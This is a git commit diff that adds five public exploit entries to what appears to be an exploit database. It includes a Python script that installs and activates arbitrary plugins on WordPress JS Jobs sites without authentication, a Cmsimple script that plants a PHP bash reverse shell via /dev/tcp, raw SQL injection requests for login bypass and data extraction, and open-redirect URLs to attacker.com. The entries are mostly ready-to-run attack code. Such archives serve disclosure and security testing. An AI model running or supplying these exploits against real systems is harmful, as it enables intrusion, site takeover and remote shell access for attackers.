DB: 2021-10-01

5 changes to exploits/shellcodes Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) PlaceOS 1.2109.1 - Open Redirection
2021-10-01 05:02:17 +00:00 · 2021-10-01 05:02:17 +00:00 · f32872547a
commit f32872547a
parent 68d01808ce
6 changed files with 286 additions and 0 deletions
--- a/exploits/multiple/webapps/50359.txt
+++ b/exploits/multiple/webapps/50359.txt
@ -0,0 +1,18 @@
+# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
+# Date: 29-09-2021
+# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
+# Vendor Homepage: https://place.technology/
+# Software Link: https://github.com/PlaceOS
+# Version: < 1.29.10
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-41826
+#
+#
+# PoC:  "https://office.example.com/auth/logout?continue=//attacker.com"
+#           "https://office.example.com/auth/logout?continue=.attacker.com"
+#           "https://office.example.com/auth/logout?continue=:password@attacker.com"
+#
+#
+# Reference: https://github.com/PlaceOS/auth/issues/36
+#                  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
+#                  https://nvd.nist.gov/vuln/detail/CVE-2021-41826
--- a/exploits/php/webapps/50354.py
+++ b/exploits/php/webapps/50354.py
@ -0,0 +1,71 @@
+# Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation
+# Google Dork: inurl:/wp-content/plugins/js-jobs/
+# Date: 22/09/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugins/js-jobs/
+# Version: <= 1.9.1.4
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+	print("JS Job Manager <= 1.1.7 - Arbitrary Plugin Install/Activation")
+	print("Author -> space_hen (www.github.com/spacehen)")
+
+
+def print_usage():
+	print("Usage: python3 exploit.py [target url] [plugin slug]")
+	print("Ex: python3 exploit.py https://example.com advanced-uploader")
+	print("Note: To activate plugin successfully, main plugin file")
+	print("should match slug, i.e ./plugin-slug/plugin-slug.php")
+
+def vuln_check(uri):
+	response = requests.get(uri)
+	raw = response.text
+
+	if ("Not Allowed!" in raw):
+		return True;
+	else:
+		return False;
+
+def main():
+
+	print_banner()
+	if(len(sys.argv) != 3):
+		print_usage();
+		sys.exit(1);
+
+	base = sys.argv[1]
+	slug = sys.argv[2]
+
+	ajax_action = 'jsjobs_ajax'
+	admin = '/wp-admin/admin-ajax.php';
+
+	uri = base + admin + '?action=' + ajax_action ;
+	check = vuln_check(uri);
+
+	if(check == False):
+		print("(*) Target not vulnerable!");
+		sys.exit(1)
+
+	data = {
+	"task" : "installPluginFromAjax",
+	"jsjobsme" : "jsjobs",
+	"pluginslug" : slug
+	}
+	print("Installing plugin...");
+	response = requests.post(uri, data=data )
+	print("Activating plugin...");
+
+	data = {
+	"task" : "activatePluginFromAjax",
+	"jsjobsme" : "jsjobs",
+	"pluginslug" : slug
+	}
+	response = requests.post(uri, data=data )
+
+main();
--- a/exploits/php/webapps/50355.txt
+++ b/exploits/php/webapps/50355.txt
@ -0,0 +1,32 @@
+# Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - SQL Injection Authentication Bypass
+# Date: 29-09-2021
+# Exploit Author: sudoninja
+# Vendor Homepage: https://phpgurukul.com
+# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+# Version: 1.0
+# Tested on: XAMPP / Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- -  and password to ccms
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+
+POST /ccms/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/ccms/
+Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
+Upgrade-Insecure-Requests: 1
+
+username='%20OR%201%20--%20-&password=ccms&login=
--- a/exploits/php/webapps/50356.py
+++ b/exploits/php/webapps/50356.py
@ -0,0 +1,60 @@
+# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
+# Date: 29.09.2021
+# Exploit Author: pussycat0x
+# Vendor Homepage: https://www.cmsimple.org/
+# Version: 5.4
+# Tested on: ubuntu-20.04.1
+
+import argparse
+from bs4 import BeautifulSoup
+from argparse import ArgumentParser
+import requests
+parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
+rparser = parser.add_argument_group('required argument')
+rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
+rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
+rparser.add_argument('-p','--password',type=str,help='', required=True)
+rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
+rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
+args= parser.parse_args()
+#url ='192.168.1.106'
+s = requests.Session()
+
+def main():
+	try:
+
+		url =(args.host)
+		payload = {
+		'user':args.username,
+		'passwd':args.password,
+		'submit': 'Login',
+		'login':'true',
+		}
+		login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
+		if login.status_code == 200:
+			print('Exploit Completed')
+		else:
+			print("Invalid Credential")
+		cook =(login.cookies.get_dict())
+		temp = s.get(url +'/?file=template&action=edit', cookies=cook)
+		soup = BeautifulSoup(temp.text, 'lxml')
+		csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
+		#<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
+		rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"""
+		rev2=(args.lhost)
+		rev3=(args.lport)
+		rev4=""" 0>&1'");"""
+		php =(rev+rev2+'/'+rev3+rev4)
+		revpayload = {
+		'cmsimpleDataFileStored':'cmsimpleDataFileStored',
+		'csrf_token':csrfToken,
+		'text':php,
+		'file':'template',
+		'action':'save',
+		}
+		shell = s.post(url +'/',cookies=cook , data=revpayload)
+		exec = s.get(url+'/')
+		exit()
+	except:
+		pass
+main()
--- a/exploits/php/webapps/50357.txt
+++ b/exploits/php/webapps/50357.txt
@ -0,0 +1,100 @@
+# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
+# Date: 28.09.2021
+# Exploit Author: Murat
+# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
+# Version: 1.0
+# Tested on: Windows 10
+
+# Pharmacy Point of Sale System v1.0 SQLi
+
+
+GET /pharmacy/view_product.php?id=-1 HTTP/1.1
+Host: localhost
+Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
+Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Connection: close
+
+
+POC:
+https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--
+
+-----------------------------------------------------------------------
+
+#Other parameters with sql injection vulnerability;
+
+
+==> /pharmacy/?date_from=&date_to=1'"&page=sales_report
+
+==> /pharmacy/?date_from=1'"&date_to=&page=sales_report
+
+==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1
+
+==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true
+
+==> /pharmacy/manage_product.php?id=-1'
+
+==> POST /pharmacy/Actions.php?a=save_stock
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="id"
+
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="supplier_id"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="product_id"
+
+2'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="quantity"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="expiry_date"
+
+
+==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1
+
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="id"
+
+5'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="product_code"
+
+94102'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="category_id"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="name"
+
+pHqghUme'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="price"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="description"
+
+1'"
+------------YWJkMTQzNDcw
+Content-Disposition: form-data; name="status"
+
+0'"
+------------YWJkMTQzNDcw--
+-
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44469,3 +44469,8 @@ id,file,description,date,author,type,platform,port
 50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
+50354,exploits/php/webapps/50354.py,"Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation",1970-01-01,spacehen,webapps,php,
+50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
+50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
+50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
+50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,